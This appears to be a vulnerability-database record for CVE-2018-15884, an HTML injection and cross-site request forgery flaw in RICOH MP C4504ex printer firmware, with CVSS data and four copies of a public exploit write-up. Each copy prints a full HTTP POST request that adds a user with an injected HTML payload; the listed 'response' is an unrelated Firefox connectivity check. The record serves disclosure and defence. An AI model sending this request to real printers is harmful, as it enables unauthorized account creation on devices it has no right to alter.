ID CVE-2018-15884
Type cve
Reporter cve@mitre.org
Modified 2020-08-24T17:37:00
Description
RICOH MP C4504ex devices allow HTML Injection via the /web/entry/en/address/adrsSetUserWizard.cgi entryNameIn parameter.
{"id": "CVE-2018-15884", "bulletinFamily": "NVD", "title": "CVE-2018-15884", "description": "RICOH MP C4504ex devices allow HTML Injection via the /web/entry/en/address/adrsSetUserWizard.cgi entryNameIn parameter.", "published": "2018-08-28T19:29:00", "modified": "2020-08-24T17:37:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15884", "reporter": "cve@mitre.org", "references": ["http://packetstormsecurity.com/files/149082/RICOH-MP-C4504ex-Cross-Site-Request-Forgery.html", "https://www.exploit-db.com/exploits/45264/"], "cvelist": ["CVE-2018-15884"], "type": "cve", "lastseen": "2020-10-03T13:20:15", "edition": 4, "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-30957"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:2580AED27F10B802E261154B673BAE2B"]}, {"type": "exploitdb", "idList": ["EDB-ID:45264"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:149082"]}], "modified": "2020-10-03T13:20:15", "rev": 2}, "score": {"value": 4.6, "vector": "NONE", "modified": "2020-10-03T13:20:15", "rev": 2}, "vulnersScore": 4.6}, "cpe": ["cpe:/o:ricoh:mp_c4504ex_firmware:-"], "affectedSoftware": [{"cpeName": "ricoh:mp_c4504ex_firmware", "name": "ricoh mp c4504ex firmware", "operator": "eq", "version": "-"}], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "cpe23": ["cpe:2.3:o:ricoh:mp_c4504ex_firmware:-:*:*:*:*:*:*:*"], "cwe": ["CWE-79", "CWE-352"], "scheme": null, "affectedConfiguration": [{"cpeName": "ricoh:mp_c4504ex", "name": "ricoh mp c4504ex", "operator": "eq", "version": "-"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:h:ricoh:mp_c4504ex:-:*:*:*:*:*:*:*", "vulnerable": false}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:o:ricoh:mp_c4504ex_firmware:-:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}], "operator": "AND"}]}}
{"exploitdb": [{"lastseen": "2018-08-27T13:33:49", "description": "RICOH MP C4504ex Printer - Cross-Site Request Forgery (Add Admin). Webapps exploit for Hardware platform", "published": "2018-08-27T00:00:00", "type": "exploitdb", "title": "RICOH MP C4504ex Printer - Cross-Site Request Forgery (Add Admin)", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-15884"], "modified": "2018-08-27T00:00:00", "id": "EDB-ID:45264", "href": "https://www.exploit-db.com/exploits/45264/", "sourceData": "# Exploit Title: RICOH MP C4504ex Printer - Cross-Site Request Forgery (Add Admin)\r\n# Date: 2018-08-21 \r\n# Exploit Author: Ismail Tasdelen\r\n# Vendor Homepage: https://www.ricoh.com/\r\n# Hardware Link : https://www.ricoh-usa.com/en/products/pd/equipment/printers-and-copiers/multifunction-printers-copiers/mp-c4504ex-color-laser-multifunction-printer/_/R-417998\r\n# Software : RICOH Printer\r\n# Product Version: MP C4504ex\r\n# Vulernability Type : Code Injection\r\n# Vulenrability : HTML Injection\r\n# CVE : CVE-2018-15884\r\n\r\n# CSRF vulnerability has been discovered on the printer of MP C4504ex of RICOH product.\r\n# Low priviliage users are able to create administrator accounts\r\n\r\nHTTP POST Request :\r\n\r\nPOST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1\r\nHost: 192.168.0.10\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\nAccept: text/plain, */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://192.168.0.10/web/entry/en/address/adrsList.cgi\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: 193\r\nCookie: risessionid=132072532817225; cookieOnOffChecker=on; wimsesid=103007361\r\nConnection: close\r\n\r\nmode=ADDUSER&step=BASE&wimToken=2051165463&entryIndexIn=00007&entryNameIn=%22%3E%3Ch1%3EIsmail%3C%2Fh1%3E&entryDisplayNameIn=&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1\r\n\r\nHTTP Response Request :\r\n\r\nGET /success.txt HTTP/1.1\r\nHost: detectportal.firefox.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nCache-Control: no-cache\r\nPragma: no-cache\r\nConnection: close", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/45264/"}], "zdt": [{"lastseen": "2018-08-29T14:36:31", "description": "Exploit for hardware platform in category web applications", "edition": 1, "published": "2018-08-28T00:00:00", "title": "RICOH MP C4504ex Printer - Cross-Site Request Forgery (Add Admin) Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-15884"], "modified": "2018-08-28T00:00:00", "id": "1337DAY-ID-30957", "href": "https://0day.today/exploit/description/30957", "sourceData": "# Exploit Title: RICOH MP C4504ex Printer - Cross-Site Request Forgery (Add Admin)\r\n# Exploit Author: Ismail Tasdelen\r\n# Vendor Homepage: https://www.ricoh.com/\r\n# Hardware Link : https://www.ricoh-usa.com/en/products/pd/equipment/printers-and-copiers/multifunction-printers-copiers/mp-c4504ex-color-laser-multifunction-printer/_/R-417998\r\n# Software : RICOH Printer\r\n# Product Version: MP C4504ex\r\n# Vulernability Type : Code Injection\r\n# Vulenrability : HTML Injection\r\n# CVE : CVE-2018-15884\r\n \r\n# CSRF vulnerability has been discovered on the printer of MP C4504ex of RICOH product.\r\n# Low priviliage users are able to create administrator accounts\r\n \r\nHTTP POST Request :\r\n \r\nPOST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1\r\nHost: 192.168.0.10\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\nAccept: text/plain, */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://192.168.0.10/web/entry/en/address/adrsList.cgi\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: 193\r\nCookie: risessionid=132072532817225; cookieOnOffChecker=on; wimsesid=103007361\r\nConnection: close\r\n \r\nmode=ADDUSER&step=BASE&wimToken=2051165463&entryIndexIn=00007&entryNameIn=%22%3E%3Ch1%3EIsmail%3C%2Fh1%3E&entryDisplayNameIn=&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1\r\n \r\nHTTP Response Request :\r\n \r\nGET /success.txt HTTP/1.1\r\nHost: detectportal.firefox.com\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nCache-Control: no-cache\r\nPragma: no-cache\r\nConnection: close\n\n# 0day.today [2018-08-29] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30957"}], "packetstorm": [{"lastseen": "2018-08-27T17:58:42", "description": "", "published": "2018-08-27T00:00:00", "type": "packetstorm", "title": "RICOH MP C4504ex Cross Site Request Forgery", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-15884"], "modified": "2018-08-27T00:00:00", "id": "PACKETSTORM:149082", "href": "https://packetstormsecurity.com/files/149082/RICOH-MP-C4504ex-Cross-Site-Request-Forgery.html", "sourceData": "`# Exploit Title: RICOH MP C4504ex Printer - Cross-Site Request Forgery (Add Admin) \n# Date: 2018-08-21 \n# Exploit Author: Ismail Tasdelen \n# Vendor Homepage: https://www.ricoh.com/ \n# Hardware Link : https://www.ricoh-usa.com/en/products/pd/equipment/printers-and-copiers/multifunction-printers-copiers/mp-c4504ex-color-laser-multifunction-printer/_/R-417998 \n# Software : RICOH Printer \n# Product Version: MP C4504ex \n# Vulernability Type : Code Injection \n# Vulenrability : HTML Injection \n# CVE : CVE-2018-15884 \n \n# CSRF vulnerability has been discovered on the printer of MP C4504ex of RICOH product. \n# Low priviliage users are able to create administrator accounts \n \nHTTP POST Request : \n \nPOST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1 \nHost: 192.168.0.10 \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 \nAccept: text/plain, */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: http://192.168.0.10/web/entry/en/address/adrsList.cgi \nContent-Type: application/x-www-form-urlencoded; charset=UTF-8 \nX-Requested-With: XMLHttpRequest \nContent-Length: 193 \nCookie: risessionid=132072532817225; cookieOnOffChecker=on; wimsesid=103007361 \nConnection: close \n \nmode=ADDUSER&step=BASE&wimToken=2051165463&entryIndexIn=00007&entryNameIn=%22%3E%3Ch1%3EIsmail%3C%2Fh1%3E&entryDisplayNameIn=&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1 \n \nHTTP Response Request : \n \nGET /success.txt HTTP/1.1 \nHost: detectportal.firefox.com \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 \nAccept: */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nCache-Control: no-cache \nPragma: no-cache \nConnection: close \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/149082/ricohmpc4504ex-xsrf.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:45", "description": "\nRICOH MP C4504ex Printer - Cross-Site Request Forgery (Add Admin)", "edition": 1, "published": "2018-08-27T00:00:00", "title": "RICOH MP C4504ex Printer - Cross-Site Request Forgery (Add Admin)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-15884"], "modified": "2018-08-27T00:00:00", "id": "EXPLOITPACK:2580AED27F10B802E261154B673BAE2B", "href": "", "sourceData": "# Exploit Title: RICOH MP C4504ex Printer - Cross-Site Request Forgery (Add Admin)\n# Date: 2018-08-21 \n# Exploit Author: Ismail Tasdelen\n# Vendor Homepage: https://www.ricoh.com/\n# Hardware Link : https://www.ricoh-usa.com/en/products/pd/equipment/printers-and-copiers/multifunction-printers-copiers/mp-c4504ex-color-laser-multifunction-printer/_/R-417998\n# Software : RICOH Printer\n# Product Version: MP C4504ex\n# Vulernability Type : Code Injection\n# Vulenrability : HTML Injection\n# CVE : CVE-2018-15884\n\n# CSRF vulnerability has been discovered on the printer of MP C4504ex of RICOH product.\n# Low priviliage users are able to create administrator accounts\n\nHTTP POST Request :\n\nPOST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1\nHost: 192.168.0.10\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\nAccept: text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://192.168.0.10/web/entry/en/address/adrsList.cgi\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 193\nCookie: risessionid=132072532817225; cookieOnOffChecker=on; wimsesid=103007361\nConnection: close\n\nmode=ADDUSER&step=BASE&wimToken=2051165463&entryIndexIn=00007&entryNameIn=%22%3E%3Ch1%3EIsmail%3C%2Fh1%3E&entryDisplayNameIn=&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1\n\nHTTP Response Request :\n\nGET /success.txt HTTP/1.1\nHost: detectportal.firefox.com\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCache-Control: no-cache\nPragma: no-cache\nConnection: close", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}
